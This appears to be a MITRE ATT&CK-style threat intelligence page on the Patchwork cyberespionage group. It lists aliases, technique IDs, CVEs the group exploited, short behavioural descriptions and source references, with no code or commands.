Patchwork is a cyberespionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Patchwork has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.    
Associated Group Descriptions
|Dropping Elephant||   |
|MONSOON||MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign.  |
|Operation Hangover||It is believed that the actors behind G0040 are the same actors behind Operation Hangover.  |
Patchwork developed a file stealer to search C:\ and collect files with certain extensions. Patchwork also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server.
|Enterprise||T1088||Bypass User Account Control|
|Enterprise||T1005||Data from Local System|
|Enterprise||T1173||Dynamic Data Exchange|
|Enterprise||T1203||Exploitation for Client Execution||
Patchwork uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, and CVE-2015-1641.
|Enterprise||T1083||File and Directory Discovery|
|Enterprise||T1066||Indicator Removal from Tools|
|Enterprise||T1027||Obfuscated Files or Information|
|Enterprise||T1060||Registry Run Keys / Startup Folder|
|Enterprise||T1076||Remote Desktop Protocol|
|Enterprise||T1105||Remote File Copy|
|Enterprise||T1063||Security Software Discovery|
Patchwork has used spearphishing with links to deliver files with exploits to initial victims. The group has used embedded image tags (known as web bugs) with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.
|Enterprise||T1082||System Information Discovery||
Patchwork collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. Patchwork also enumerated all available drives on the victim's machine.
|Enterprise||T1033||System Owner/User Discovery|
- Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.
- Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.
- Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.
- Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.
- Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.
- Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.
- Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.
- Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016.